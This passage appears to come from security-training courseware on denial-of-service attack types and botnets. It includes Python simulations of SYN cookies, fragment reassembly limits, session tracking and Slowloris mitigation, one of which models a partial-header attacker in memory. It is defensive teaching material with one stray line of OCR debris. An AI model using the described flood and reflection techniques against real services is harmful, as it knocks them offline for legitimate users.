During an active TCP session, ACK and PUSH ACK are the flags used to transfer information to and from the server and client machines until the session ends. In an ACK and PUSH ACK flood attack, attackers send a large amount of spoofed ACK and PUSH ACK packets to the target machine, making it non-functional.

Countermeasures for SYN Flood Attacks

Proper packet filtering is a viable solution to SYN flood attacks. An administrator can also tune the TCP/IP stack to reduce the impact of SYN attacks while allowing legitimate client traffic. Some SYN attacks do not attempt to upset servers; instead, they attempt to consume the entire bandwidth of the Internet connection. Two tools to counter this attack are SYN cookies and SynAttackProtect. On Linux, the relevant knobs are the net.ipv4.tcp_syncookies, net.ipv4.tcp_max_syn_backlog, and net.ipv4.tcp_synack_retries sysctls; SynAttackProtect is the corresponding Windows registry setting.

To guard against an attacker attempting to consume the bandwidth of an Internet connection, an administrator can implement some additional safety measures; for example, they can decrease the time-out period for which a pending connection is maintained in the "SYN_RECEIVED" state in the queue. Normally, if a client sends no ACK in response, a server retransmits its SYN/ACK packet several times before giving up. The window of exposure can be narrowed by decreasing the time before the first retransmission, decreasing the number of retransmissions, or turning off retransmissions entirely (at the cost of dropping legitimate clients on lossy links).
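The interaction between a bounded listen queue, the 75 s hold time, and SYN cookies is easiest to see in a small simulation. The following Python is an added example, not courseware code: a Listener keeps half-open entries in a fixed backlog or, with cookies enabled, encodes a time slot, the client's MSS, and a keyed hash into its initial sequence number and recovers the handshake state from the client's final ACK. SERVER_KEY, MSS_TABLE, the backlog size, the addresses, and the flood scenario are assumptions made for the example.

```python
"""SYN flood against a bounded listen queue versus SYN cookies (simulation).

Added example, not courseware code.  SERVER_KEY, MSS_TABLE, the 75 s timeout,
the backlog size and all addresses are assumptions made for the example.
"""
import hashlib
import hmac

SERVER_KEY = b"example-secret-rotate-often"   # assumed secret; real stacks rotate it
MSS_TABLE = (536, 1220, 1440, 1460)          # 2-bit index of encodable MSS values


def _tag(src, sport, dst, dport, client_isn, tslot):
    """Keyed 32-bit hash over the 4-tuple, the client's ISN and a time slot."""
    msg = f"{src}:{sport}:{dst}:{dport}:{client_isn}:{tslot}".encode()
    return int.from_bytes(hmac.new(SERVER_KEY, msg, hashlib.sha256).digest()[:4], "big")


def make_cookie(src, sport, dst, dport, client_isn, mss, now):
    """Server ISN = 5-bit time slot | 2-bit MSS index | 25-bit keyed hash."""
    tslot = (int(now) // 64) & 0x1F                      # 64 s granularity
    midx = max((i for i, v in enumerate(MSS_TABLE) if v <= mss), default=0)
    tag = _tag(src, sport, dst, dport, client_isn, tslot) & 0x1FFFFFF
    return (tslot << 27) | (midx << 25) | tag


def check_cookie(cookie, src, sport, dst, dport, client_isn, now):
    """Return the negotiated MSS if the cookie is recent and authentic, else None."""
    tslot, midx, tag = (cookie >> 27) & 0x1F, (cookie >> 25) & 0x3, cookie & 0x1FFFFFF
    if ((int(now) // 64) - tslot) & 0x1F > 1:            # older than two slots
        return None
    if tag != _tag(src, sport, dst, dport, client_isn, tslot) & 0x1FFFFFF:
        return None
    return MSS_TABLE[midx]


class Listener:
    """A listening socket with a bounded SYN_RECEIVED queue or SYN cookies."""

    def __init__(self, addr, backlog_max, timeout=75.0, cookies=False):
        self.addr = addr                    # (ip, port) of the listener
        self.backlog_max = backlog_max
        self.timeout = timeout              # seconds a half-open entry is held
        self.cookies = cookies
        self.half_open = {}                 # (src, sport) -> (server_isn, expiry)
        self.established = set()

    def _expire(self, now):
        for key, (_, expiry) in list(self.half_open.items()):
            if expiry <= now:
                del self.half_open[key]

    def on_syn(self, src, sport, client_isn, mss, now):
        """Handle a SYN; return the SYN/ACK sequence number or None if dropped."""
        if self.cookies:                    # stateless: nothing stored per SYN
            return make_cookie(src, sport, *self.addr, client_isn, mss, now)
        self._expire(now)
        if len(self.half_open) >= self.backlog_max:
            return None                     # queue full: SYN silently dropped
        server_isn = _tag(src, sport, *self.addr, client_isn, 0)  # any ISN will do here
        self.half_open[(src, sport)] = (server_isn, now + self.timeout)
        return server_isn

    def on_ack(self, src, sport, client_isn, ack_num, now):
        """Handle the handshake's final ACK; ack_num must equal server_isn + 1."""
        if self.cookies:
            cookie = (ack_num - 1) & 0xFFFFFFFF
            if check_cookie(cookie, src, sport, *self.addr, client_isn, now) is None:
                return False
        else:
            self._expire(now)
            entry = self.half_open.pop((src, sport), None)
            if entry is None or (entry[0] + 1) & 0xFFFFFFFF != ack_num:
                return False
        self.established.add((src, sport))
        return True


def flood_then_connect(cookies, spoofed=50):
    """Constructed scenario: spoofed SYNs that never ACK, then one real client."""
    srv = Listener(("10.0.0.5", 443), backlog_max=8, cookies=cookies)
    for i in range(spoofed):
        srv.on_syn(f"198.51.100.{i}", 40000 + i, 1000 + i, 1460, now=10.0)
    seq = srv.on_syn("192.0.2.7", 51515, 777, 1460, now=11.0)
    if seq is None:
        return False                        # legitimate SYN dropped: flood succeeded
    return srv.on_ack("192.0.2.7", 51515, 777, (seq + 1) & 0xFFFFFFFF, now=11.1)


if __name__ == "__main__":
    print("backlog only :", "connected" if flood_then_connect(False) else "denied")
    print("SYN cookies  :", "connected" if flood_then_connect(True) else "denied")
```

Running the module shows the backlog-only listener denying the legitimate client after the spoofed burst (its eight slots are held for 75 s), while the cookie-protected listener connects it. Real stacks rotate the key and use finer timestamps; the 5-bit slot here expires a cookie after roughly two minutes, and because only the fields encoded in the cookie survive, a cookie-mode server can honour only the few TCP options it encodes.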

Fragmentation Attack
These attacks destroy a victim's ability to reassemble fragmented packets by flooding it with TCP or UDP fragments, resulting in reduced performance. In fragmentation attacks, the attacker sends a large number of fragmented (1500+ byte) packets to a target web server with a relatively small packet rate. Since the protocol allows fragmentation, these packets are usually uninspected as they pass through network equipment such as routers, firewalls, and the intrusion detection system (IDS)/intrusion prevention system (IPS). The reassembly and inspection of these large fragmented packets consume excessive resources. Moreover, the content in the packet fragments is randomized by the attacker, which makes the reassembly and inspection consume more resources and, in turn, causes the system to crash.

Figure 10.9: Fragmentation attack (an original packet of four data segments split into fragments 1 through 4)
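The resource under attack is the reassembly buffer, so the defensive side of this passage is a reassembler that refuses to hold unbounded state. The Python below is an added example, not courseware code; its simplified fragment model (a per-source ip_id, byte offsets, and a more-fragments flag), the limits, and the constructed flood are assumptions for the example. It goes slightly beyond the text in also rejecting overlapping fragments, the other classic reassembly abuse.

```python
"""Bounded IP fragment reassembly, the resource a fragmentation flood targets.

Added example, not courseware code.  The simplified fragment model (per-source
ip_id, byte offsets, a more_fragments flag), the limits and the constructed
flood are assumptions made for the example."""


class Reassembler:
    """Buffers fragments per (src, ip_id) with caps on datagrams, fragments per
    datagram, datagram size and age, so an attacker cannot pin memory forever."""

    def __init__(self, max_datagrams=64, max_frags=16, max_bytes=65535, timeout=30.0):
        self.max_datagrams = max_datagrams
        self.max_frags = max_frags
        self.max_bytes = max_bytes
        self.timeout = timeout
        self.pending = {}      # (src, ip_id) -> {"frags": {offset: bytes}, "total": int|None, "born": float}
        self.dropped = 0       # incomplete datagrams discarded by a limit

    def _discard(self, key):
        del self.pending[key]
        self.dropped += 1

    def _reap(self, now):
        for key, dg in list(self.pending.items()):
            if now - dg["born"] > self.timeout:
                self._discard(key)

    def add(self, src, ip_id, offset, payload, more_fragments, now):
        """Feed one fragment; return the reassembled payload when complete, else None."""
        self._reap(now)
        key = (src, ip_id)
        dg = self.pending.get(key)
        if dg is None:
            if len(self.pending) >= self.max_datagrams:       # table full: evict the oldest
                self._discard(min(self.pending, key=lambda k: self.pending[k]["born"]))
            dg = self.pending[key] = {"frags": {}, "total": None, "born": now}
        end = offset + len(payload)
        overlap = any(o < end and offset < o + len(p) for o, p in dg["frags"].items())
        if overlap or len(dg["frags"]) >= self.max_frags or end > self.max_bytes:
            self._discard(key)                                 # malformed or oversized: drop it all
            return None
        dg["frags"][offset] = payload
        if not more_fragments:
            dg["total"] = end                                  # last fragment fixes the length
        if dg["total"] is not None:
            data = self._assemble(dg)
            if data is not None:
                del self.pending[key]
                return data
        return None

    @staticmethod
    def _assemble(dg):
        pos, out = 0, bytearray()
        while pos < dg["total"]:
            chunk = dg["frags"].get(pos)
            if chunk is None:
                return None                                    # hole: keep waiting
            out += chunk
            pos += len(chunk)
        return bytes(out)

    def memory_in_use(self):
        return sum(len(p) for dg in self.pending.values() for p in dg["frags"].values())


def fragment_flood(n_datagrams, frags_each, frag_size=1480):
    """Constructed flood: every datagram is missing its first fragment, so none
    can ever complete; only the caps keep memory bounded.  Returns
    (bytes held, datagrams pending, datagrams dropped)."""
    r = Reassembler(max_datagrams=64, max_frags=8)
    for i in range(n_datagrams):
        for f in range(frags_each):
            r.add(f"203.0.113.{i % 250}", i, (f + 1) * frag_size, b"\x00" * frag_size, True, now=0.0)
    return r.memory_in_use(), len(r.pending), r.dropped


if __name__ == "__main__":
    held, pending, dropped = fragment_flood(1000, 4)
    print(f"{pending} datagrams pending, {held} bytes held, {dropped} dropped")
```

The flood of a thousand never-completing datagrams leaves the table at its 64-datagram cap rather than growing without bound; the age limit covers the slower variant in which fragments arrive at the "relatively small packet rate" the passage mentions. Production stacks add a global memory budget (Linux exposes it as net.ipv4.ipfrag_high_thresh), which is the same idea applied across all datagrams.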

ical andCountermensores
Mackin ©by E-Comel
Copyright
Spoofed Session Flood Attack
In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets. Attackers employ this attack to bypass firewalls and perform DDoS attacks against target networks, exhausting their network resources.

The following are examples of spoofed session flood attacks:

• Multiple SYN-ACK Spoofed Session Flood Attack
  In this type of flood attack, attackers create a fake session with multiple SYN and multiple ACK packets, along with one or more RST or FIN packets.

• Multiple ACK Spoofed Session Flood Attack
  In this type of flood attack, attackers create a fake session by completely skipping SYN packets and using only multiple ACK packets along with one or more RST or FIN packets. Because SYN packets are not employed and firewalls mostly use SYN packet filters to detect abnormal traffic, the DDoS detection rate of the firewalls is very low for these types of attacks.
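The evasion described above works against filters that only look at SYNs, so a detector needs to track handshake state. The Python below is an added example, not courseware code: a SessionTracker follows each 4-tuple through the handshake and close, counts per source the packets that arrive with no handshake behind them (the skip-SYN variant), and counts per source the sessions that are opened and torn down without ever carrying data (the multiple SYN-ACK variant). The packet tuples, addresses, and thresholds are constructed for the example.

```python
"""Stateful TCP session tracking to catch spoofed session floods.

Added example, not courseware code.  Packet records are (src, sport, dst,
dport, flags) tuples; addresses and thresholds are constructed for the example."""
from collections import Counter

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


class SessionTracker:
    """Follows each TCP 4-tuple through SYN_SENT, SYN_RECV, ESTABLISHED,
    CLOSING and TIME_WAIT, keyed by the client side of the connection."""

    def __init__(self):
        self.state = {}                  # client (src, sport, dst, dport) -> state
        self.data_seen = set()           # client tuples that carried a PSH segment
        self.orphans = Counter()         # src -> packets with no handshake behind them
        self.empty_sessions = Counter()  # client src -> sessions torn down without data

    def _close(self, client):
        if client not in self.data_seen:
            self.empty_sessions[client[0]] += 1
        self.state.pop(client, None)
        self.data_seen.discard(client)

    def feed(self, src, sport, dst, dport, flags):
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if flags & SYN and not flags & ACK:                 # client opens a session
            self.state[fwd] = "SYN_SENT"
            return
        if flags & SYN:                                     # server answers a SYN
            if self.state.get(rev) == "SYN_SENT":
                self.state[rev] = "SYN_RECV"
            else:
                self.orphans[src] += 1                      # SYN/ACK for a SYN never seen
            return
        client = fwd if fwd in self.state else rev if rev in self.state else None
        if client is None or (self.state[client] == "SYN_SENT" and client == fwd):
            self.orphans[src] += 1                          # ACK/RST/FIN with no handshake (skip-SYN variant)
            return
        st = self.state[client]
        if st == "SYN_RECV" and client == fwd and flags & ACK:
            st = self.state[client] = "ESTABLISHED"         # third step of the handshake
        if flags & PSH and st == "ESTABLISHED":
            self.data_seen.add(client)
        if flags & RST:
            self._close(client)
        elif flags & FIN:
            self.state[client] = "TIME_WAIT" if st == "CLOSING" else "CLOSING"
        elif st == "TIME_WAIT" and flags & ACK:
            self._close(client)                             # final ACK of the close

    def suspicious(self, orphan_threshold, empty_threshold):
        bad = {s for s, n in self.orphans.items() if n >= orphan_threshold}
        bad |= {s for s, n in self.empty_sessions.items() if n >= empty_threshold}
        return sorted(bad)


def sample_packets():
    """Constructed traffic: one legitimate session, an ACK-only spoofed session
    flood from 198.51.100.7 and a SYN-ACK spoofed session flood from 198.51.100.8."""
    C, S, A, B = "192.0.2.10", "203.0.113.80", "198.51.100.7", "198.51.100.8"
    pkts = [(C, 40000, S, 80, SYN), (S, 80, C, 40000, SYN | ACK), (C, 40000, S, 80, ACK),
            (C, 40000, S, 80, PSH | ACK), (S, 80, C, 40000, ACK), (S, 80, C, 40000, PSH | ACK),
            (C, 40000, S, 80, ACK), (C, 40000, S, 80, FIN | ACK), (S, 80, C, 40000, ACK),
            (S, 80, C, 40000, FIN | ACK), (C, 40000, S, 80, ACK)]
    for p in range(1000, 1006):                    # no SYN at all, then RST
        pkts += [(A, p, S, 80, ACK), (A, p, S, 80, ACK), (A, p, S, 80, RST)]
    for p in range(2000, 2005):                    # SYN, SYN/ACK, ACK, ACK, RST: no data
        pkts += [(B, p, S, 80, SYN), (S, 80, B, p, SYN | ACK), (B, p, S, 80, ACK),
                 (B, p, S, 80, ACK), (B, p, S, 80, RST)]
    return pkts


def run_tracker(packets):
    t = SessionTracker()
    for pkt in packets:
        t.feed(*pkt)
    return t


def analyze(packets, orphan_threshold=10, empty_threshold=5):
    """Return the sources that exceed either threshold."""
    return run_tracker(packets).suspicious(orphan_threshold, empty_threshold)


if __name__ == "__main__":
    print("suspicious sources:", analyze(sample_packets()))
```

The legitimate session passes through every state and closes cleanly, contributing nothing to either counter, while the two attack sources trip the orphan and empty-session thresholds respectively. The same two counters are what a stateful firewall or IDS keeps per source; a stateless SYN filter has neither, which is the gap the passage describes.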

HTTP GET/POST and Slowloris Attacks

HTTP GET/POST Attack

HTTP attacks are layer-7 attacks. HTTP clients, such as web browsers, connect to a web server through HTTP to send HTTP requests, which can be either HTTP GET or HTTP POST. Attackers exploit these requests to perform DoS attacks.
In an HTTP GET attack, the attacker uses a time-delayed HTTP header to hold on to an HTTP connection and exhaust web-server resources. The attacker never sends the full request to the target server. Consequently, the server retains the HTTP connection and waits, making it inaccessible for legitimate users. In these types of attacks, all the network parameters appear healthy while the service remains unavailable.

In an HTTP POST attack, the attacker sends HTTP requests with complete headers but an incomplete message body to the target web server or application. Because the message body is incomplete, the server waits for the rest of the body, making the web server or web application unavailable to legitimate users.

An HTTP GET/POST attack is a sophisticated layer-7 attack that does not use malformed packets, spoofing, or reflection techniques. This type of attack requires less bandwidth than other attacks to bring down the targeted site or web server. This attack aims to compel the server to allocate as many resources as possible to serve the attack, thereby denying legitimate users access to the server's resources.

Figure: HTTP GET attack (a request with a time-delayed HTTP header; the target server waits for the complete header) and HTTP POST attack (the target server waits for the message body)
In addition to the aforementioned HTTP GET/POST attack, attackers can employ the following HTTP flood attacks to exhaust the target network's bandwidth:

• Single-Session HTTP Flood Attack
  In this type of flood attack, an attacker exploits HTTP 1.1 persistent connections (keep-alive) to bombard a target with multiple requests in a single HTTP session.

• Single-Request HTTP Flood Attack
  In this type of flood attack, attackers make several HTTP requests from a single HTTP session by masking these requests within one HTTP packet. This technique allows attackers to be anonymous and invisible while performing DDoS attacks.

• Recursive HTTP GET Flood Attack
  Staying undetected is key for attackers. An attacker posing as a legitimate user and performing legitimate actions can trick any firewall into believing that the source is legitimate while it is not. Recursive GET collects a list of pages or images and appears to be going through these pages or images. However, it stealthily performs flooding attacks on the target. The recursive GET in combination with an HTTP flood attack can cause extreme damage to the target.

• Random Recursive GET Flood Attack
  This type of attack is a tweaked version of the recursive GET flood attack. It is designed for forums, blogs, and other websites that have pages in a sequence. Similar to the recursive GET flood attack, in this attack, the recursive GET pretends to be going through pages. Because the targets are forums, groups, and other blogs, the attacker uses random numbers from a valid page range to pose as a legitimate user and sends a new GET request each time. In both recursive GET and random recursive GET flood attacks, the target is bombarded with a large number of GET requests, exhausting its resources.

Slowloris Attack

Slowloris is a DDoS attack tool used to perform layer-7 DDoS attacks to take down web infrastructure. It is distinctly different from other tools in that it uses perfectly legitimate HTTP traffic to take down a target server. In Slowloris attacks, the attacker sends partial HTTP requests to the target web server or application. Upon receiving the partial requests, the target server opens multiple connections and waits for the requests to complete. However, these requests remain incomplete, causing the target server's maximum concurrent connection pool to be filled up and additional connection attempts to be denied.

Figure: Normal HTTP request-response connection versus a Slowloris DDoS attack (partial HTTP requests holding connections open)
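The mechanism is a connection pool that waits indefinitely for the rest of a request, and the fix is two limits on that wait. The Python below is an added example, not courseware code: it models a pool with an optional total header timeout (measured from connection open, because Slowloris keeps trickling bytes and so defeats an idle timer) and an optional per-source connection cap, then replays a constructed Slowloris run that reconnects whenever it is cut off. The pool size, timeouts, addresses, and traffic are assumptions for the example.

```python
"""Why slow partial requests exhaust a connection pool, and the two limits
that stop it.  Added example, not courseware code; pool size, timeouts,
addresses and the constructed Slowloris traffic are assumptions."""


class ConnectionPool:
    """Server-side connection slots; a request is serviceable once its header
    block (terminated by a blank line) has fully arrived."""

    def __init__(self, max_conns, header_timeout=None, per_source=None):
        self.max_conns = max_conns
        self.header_timeout = header_timeout    # None = wait forever (the vulnerable setting)
        self.per_source = per_source            # None = no per-IP cap
        self.conns = {}                         # id -> {"src", "opened", "buf", "done"}
        self.next_id = 0
        self.rejected = 0

    def reap(self, now):
        """Drop connections whose header is still incomplete header_timeout
        seconds after open; deliberately not an idle timeout."""
        if self.header_timeout is None:
            return
        for cid, c in list(self.conns.items()):
            if not c["done"] and now - c["opened"] > self.header_timeout:
                del self.conns[cid]

    def open(self, src, now):
        self.reap(now)
        from_src = sum(1 for c in self.conns.values() if c["src"] == src)
        if len(self.conns) >= self.max_conns or (
                self.per_source is not None and from_src >= self.per_source):
            self.rejected += 1
            return None
        cid, self.next_id = self.next_id, self.next_id + 1
        self.conns[cid] = {"src": src, "opened": now, "buf": b"", "done": False}
        return cid

    def recv(self, cid, data, now):
        """Append bytes; return True once the header block is complete."""
        c = self.conns.get(cid)
        if c is None:
            return False
        c["buf"] += data
        c["done"] = b"\r\n\r\n" in c["buf"]
        return c["done"]

    def close(self, cid):
        self.conns.pop(cid, None)


PARTIAL = b"GET / HTTP/1.1\r\nHost: victim.example\r\nUser-Agent: x\r\n"  # no blank line
KEEPALIVE = b"X-a: b\r\n"                                                # Slowloris trickle


def slowloris(pool, attacker, n_conns, duration, interval=10.0):
    """Constructed attacker: opens n_conns, sends a partial header, then one
    more header line every interval, reopening any slot the server closed."""
    ids = [pool.open(attacker, 0.0) for _ in range(n_conns)]
    for cid in ids:
        if cid is not None:
            pool.recv(cid, PARTIAL, 0.0)
    t = interval
    while t <= duration:
        pool.reap(t)
        for i, cid in enumerate(ids):
            if cid in pool.conns:
                pool.recv(cid, KEEPALIVE, t)
            else:                                # cut off (or never admitted): try again
                ids[i] = pool.open(attacker, t)
                if ids[i] is not None:
                    pool.recv(ids[i], PARTIAL, t)
        t += interval


def legit_request(pool, src, now):
    """A normal client: connect, send the whole header at once, close."""
    cid = pool.open(src, now)
    if cid is None:
        return False
    done = pool.recv(cid, b"GET /index.html HTTP/1.1\r\nHost: victim.example\r\n\r\n", now)
    pool.close(cid)
    return done


def scenario(header_timeout, per_source):
    """Two minutes of Slowloris from one source, then one legitimate request."""
    pool = ConnectionPool(max_conns=150, header_timeout=header_timeout, per_source=per_source)
    slowloris(pool, "198.51.100.9", n_conns=200, duration=120.0)
    return legit_request(pool, "192.0.2.4", now=130.0)


if __name__ == "__main__":
    for ht, ps in [(None, None), (30.0, None), (None, 20), (30.0, 20)]:
        print(f"header_timeout={ht} per_source={ps}: legit request served = {scenario(ht, ps)}")
```

With neither limit the pool fills and the legitimate request is refused. A header timeout alone does not help against a client that simply reconnects, whereas a per-source cap (with or without the timeout) keeps slots free. Apache's mod_reqtimeout and nginx's client_header_timeout are production equivalents of the timeout; the per-source cap corresponds to a connection-limiting module or a front-end proxy, and the two are normally deployed together.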

UDP Application Layer Flood Attack

Though UDP flood attacks are known for their volumetric attack nature, some application layer protocols that rely on UDP can be employed by attackers to perform flood attacks on target networks.

The following are examples of UDP-based application layer protocols that attackers can employ for flooding target networks:

• Character Generator Protocol (CHARGEN)
• Simple Network Management Protocol version 2 (SNMPv2)
• Network Basic Input/Output System (NetBIOS)
• Quote of the Day (QOTD)
• Trivial File Transfer Protocol (TFTP)
• Network Time Protocol (NTP)
• Quake Network Protocol
• Simple Service Discovery Protocol (SSDP)
• Remote procedure call (RPC)
• Steam Protocol
• Voice over Internet Protocol (VoIP)
• Connection-less Lightweight Directory Access Protocol (CLDAP)
Multi-Vector Attack
In multi-vector DDoS attacks, the attacker uses combinations of volumetric, protocol, and application layer attacks to take down the target system or service. The attacker quickly changes from one form of DDoS attack (e.g., SYN packets) to another (layer 7). These attacks are launched either through one vector at a time or through multiple vectors in parallel to confuse a company's IT department, making them spend all their resources and maliciously diverting their focus.

Figure 10.12: Multi-vector attack (vectors launched in sequence or in parallel)

Peer-to-Peer Attack
A peer-to-peer attack is a form of DDoS attack in which the attacker exploits a number of bugs in peer-to-peer servers to initiate a DDoS attack. Attackers exploit flaws found in networks that use the Direct Connect (DC++) protocol, which allows the exchange of files between instant-messaging clients. This kind of attack does not use botnets. Unlike a botnet-based attack, a peer-to-peer attack eliminates the need for attackers to communicate with the clients they subvert. Here, the attacker instructs clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and instead connect to the victim's website. Consequently, several thousand computers may aggressively attempt to connect to a target website, causing a drop in the performance of the target website. It is easy to identify peer-to-peer attacks based on signatures. By using this method, attackers launch massive DoS attacks to compromise websites.

Peer-to-peer DDoS attacks can be minimized by specifying ports for peer-to-peer communication. For example, specifying port 80 to disallow peer-to-peer communication minimizes the possibility of attacks on websites.

Figure 10.13: Peer-to-peer attack
a
Permanent Denial-of-Service Attack
Permanent DoS (PDoS) attacks, also known as phlashing, purely target hardware and cause irreversible damage to it. Unlike other types of DoS attacks, a PDoS attack sabotages the system hardware, requiring the victim to replace or reinstall the hardware. The PDoS attack exploits security flaws in a device to allow remote administration on the management interfaces of the victim's hardware, such as printers, routers, and other networking devices.

This type of attack is quicker and more destructive than conventional DoS attacks. It works with a limited amount of resources, unlike a DDoS attack, in which attackers unleash a set of zombies onto a target. Attackers perform PDoS attacks by using a method known as the "bricking" of a system. In this method, the attacker sends emails, IRC chats, tweets, or videos with fraudulent content for hardware updates to the victim. The hardware updates are modified and corrupted with vulnerabilities or defective firmware. When the victim clicks on a link or pop-up window referring to the fraudulent hardware update, the victim installs it in their system. Consequently, the attacker attains complete control over the victim's system.

Figure 10.14: Permanent DoS attack (the attacker sends emails, IRC chats, tweets, posts, or videos with fraudulent content for hardware updates; the attacker gets access to the victim's computer when the malicious code is executed)

Distributed Reflection Denial-of-Service (DRDoS) Attack
A distributed reflection DoS (DRDoS) attack, also known as a "spoofed" attack, involves the use of multiple intermediary and secondary machines that contribute to a DDoS attack against a target machine or application. A DRDoS attack exploits the TCP three-way handshake.

This attack involves an attacker machine, intermediary victims (zombies), secondary victims (reflectors), and a target machine. The attacker launches this attack by sending requests to the intermediary hosts, which in turn reflect the attack traffic to the target.

The process of a DRDoS attack is as follows. First, the attacker commands the intermediary victims (zombies) to send a stream of packets (TCP SYN) with the primary target's IP address as the source IP address to other non-compromised machines (secondary victims or reflectors) in order to exhort them to establish a connection with the primary target. Consequently, the reflectors send a huge volume of traffic (SYN/ACK) to the primary target to establish a new connection with it because they believe the host requested it. The primary target discards the SYN/ACK packets received from the reflectors because it did not send the SYN packets. Meanwhile, the reflectors wait for the ACK response from the primary target. Assuming that the packet was lost, the reflector machines resend SYN/ACK packets to the primary target to establish the connection, until a time-out occurs. In this manner, the target machine is flooded with a heavy volume of traffic from the reflector machines. The combined bandwidth of these reflector machines overwhelms the target machine. (In practice, a target whose TCP stack answers each unsolicited SYN/ACK with a RST makes the reflector abandon its half-open connection immediately, which cuts the retransmission stream short; the description above assumes the SYN/ACKs are silently discarded.)

A DRDoS attack is an intelligent attack because it is very difficult or even impossible to trace the attacker. Instead of the actual attacker, the secondary victims (reflectors) seem to attack the primary target directly. This attack is more effective than a typical DDoS attack because multiple intermediary and secondary victims generate huge attack bandwidth.
Figure 10.15: Distributed reflection DoS (DRDoS) attack (attacker, intermediary victims, secondary victims, primary target)

Countermeasures

• Turn off the Character Generator Protocol (CHARGEN) service to stop this attack method.
• Download the latest updates and patches for servers.
Module Flow

Botnets

The term "bot" is a contraction of "robot" and refers to software applications that run automated tasks over the Internet. Attackers use bots to infect a large number of computers that form a network, or "botnet," allowing them to launch DDoS attacks, generate spam, spread viruses, and commit other types of crime.

This section deals with organized cyber-crime syndicates, organizational charts, botnets, and botnet propagation techniques; botnet ecosystems; scanning methods for finding vulnerable machines; and the propagation of malicious code.

Organized Cyber Crime: Organizational Chart

Organized Crime Syndicates

While cyber criminals worked independently in the past, they now tend to operate in organized groups. They are increasingly associated with organized crime syndicates and take advantage of the sophisticated techniques of these syndicates to engage in illegal activity, usually for monetary benefit. There are organized groups of cyber criminals who work in a hierarchical setup with a predefined revenue-sharing model, which is a kind of major corporation that offers services. Organized criminal groups create and rent botnets and offer various services ranging from the development of malware and hacking of bank accounts to the deployment of massive DoS attacks against any target for a price.

For example, an organized crime syndicate might perform a DDoS attack against a bank to divert the attention of the bank's security team while they clean out bank accounts with stolen account credentials. The growing involvement of organized criminal syndicates in politically motivated cyber warfare and hacktivism is a matter of concern for national security agencies.

Cybercrime features a complicated range of players, and cyber criminals are paid according to the task they perform or the position they hold. The head of the cybercrime organization (i.e., the boss) acts as a business entrepreneur. The boss does not commit any crimes directly. Immediately below the boss in the organizational hierarchy is the "underboss," who sets up a C&C server and crimeware toolkit database to manage the implementation of attacks and provide Trojans. Below the underboss are various "campaign managers" with their own affiliation networks for implementing attacks and stealing data. Finally, resellers sell the stolen data.

Botnets

Bots are software applications that run automated tasks over the Internet and perform simple repetitive tasks, such as web spidering and search engine indexing. A botnet is a huge network of compromised systems and can be used by an attacker to launch denial-of-service attacks.

Bots are used for benign data collection or data mining activities, such as "web spidering," as well as to coordinate DoS attacks. The main purpose of a bot is to collect data. There are different types of bots, such as Internet bots, IRC bots, and chatterbots. Examples of IRC bots are Supybot, Sopel, EnergyMech, and Eggdrop.

A botnet (a contraction of "roBOT NETwork") is a group of computers "infected" by bots; however, botnets can be used for both positive and negative purposes. As a hacking tool, a botnet is composed of a huge network of compromised systems. A relatively small botnet of 1,000 bots has a combined bandwidth larger than the bandwidth of most corporate systems.

The advent of botnets led to an enormous increase in cybercrime. Botnets form the core of the cybercriminal activity center that links and unites various parts of the cybercriminal world. Cybercriminal service suppliers are a part of the cybercrime network. They offer services such as malicious code development, bulletproof hosting, the creation of browser exploits, and encryption and packing.

Malicious code is the primary tool used by criminal organizations to commit cybercrimes. Botnet owners order both bots and other malicious programs such as Trojans, viruses, worms, keyloggers, and specially crafted applications to attack remote computers via networks. Developers offer malware services on public sites or closed Internet resources.

Botnets are agents that an intruder can send to a server system to perform an illegal activity. Botnets run hidden programs that allow the identification of system vulnerabilities. Attackers can use botnets to perform the tedious tasks involved in probing a system for known vulnerabilities.

Attackers can use botnets to perform the following:

• DDoS attacks: Botnets can generate DDoS attacks, which consume the bandwidth of the victim's computers. Botnets can also overload a system, wasting valuable host system resources and destroying network connectivity.
• Spamming: Attackers use a SOCKS proxy for spamming. They harvest email addresses from web pages or other sources.
• Sniffing traffic: A packet sniffer observes the data traffic entering a compromised machine. It allows an attacker to collect sensitive information such as credit card numbers and passwords. The sniffer also allows an attacker to steal information from one botnet and use it against another botnet. In other words, botnets can rob one another.
• Keylogging: Keylogging is a method of recording the keys typed on a keyboard, and it provides sensitive information such as system passwords. Attackers use keylogging to harvest account login information for services such as PayPal.
• Spreading new malware: Botnets can be used to spread new bots.
• Installing advertisement add-ons: Botnets can be used to perpetrate "click fraud" by automating clicks.
• Google AdSense abuse: Some companies permit showing Google AdSense ads on their websites for economic benefits. Botnets allow an intruder to automate clicks on an ad, producing a percentage increase in the click queue.
• Attacks on IRC chat networks: Also called clone attacks, these attacks are similar to a DDoS attack. A master agent instructs each bot to link to thousands of clones within an IRC network, which can flood the network.
• Manipulating online polls and games: Every bot has a unique address, enabling it to manipulate online polls and games.
• Mass identity theft: Botnets can send a large number of emails while impersonating a reputable organization such as eBay. This technique allows attackers to steal information for identity theft.

The figure below illustrates how an attacker launches a botnet-based DoS attack on a target server. The attacker sets up a bot C&C center, following which they infect a machine (bot) and compromise it. Later, they use this bot to infect and compromise other vulnerable systems available in the network, resulting in a botnet. The bots (also known as zombies) connect to the C&C center and await instructions. Subsequently, the attacker sends malicious commands to the bots through the C&C center. Finally, as per the attacker's instructions, the bots launch a DoS attack on a target server, making its services unavailable to legitimate users in the network.

Figure: A typical botnet setup

Figure 10.19: Botnet ecosystem
Scanning Methods for Finding Vulnerable Machines

Discussed below are scanning methods used by an attacker to find vulnerable machines in a network:
• Random Scanning
  In this technique, the infected machine (an attacker's machine or a zombie) probes IP addresses randomly in the target network's IP range and checks their vulnerability. On finding a vulnerable machine, it hacks and attempts to infect the vulnerable machine by installing the same malicious code installed on it. This technique generates significant traffic because many compromised machines probe and check the same IP addresses. Malware propagates quickly in the initial stage, and the speed of propagation reduces as the number of new IP addresses available decreases with time.

• Hit-list Scanning
  Through scanning, an attacker first collects a list of potentially vulnerable machines and then creates a zombie army. Subsequently, the attacker scans the list to find a vulnerable machine. On finding one, the attacker installs malicious code on it and divides the list in half. The attacker continues to scan one half, whereas the other half is scanned by the newly compromised machine. This process keeps repeating, causing the number of compromised machines to increase exponentially. This technique ensures the installation of malicious code on all the potentially vulnerable machines in the hit list within a short time.

• Topological Scanning
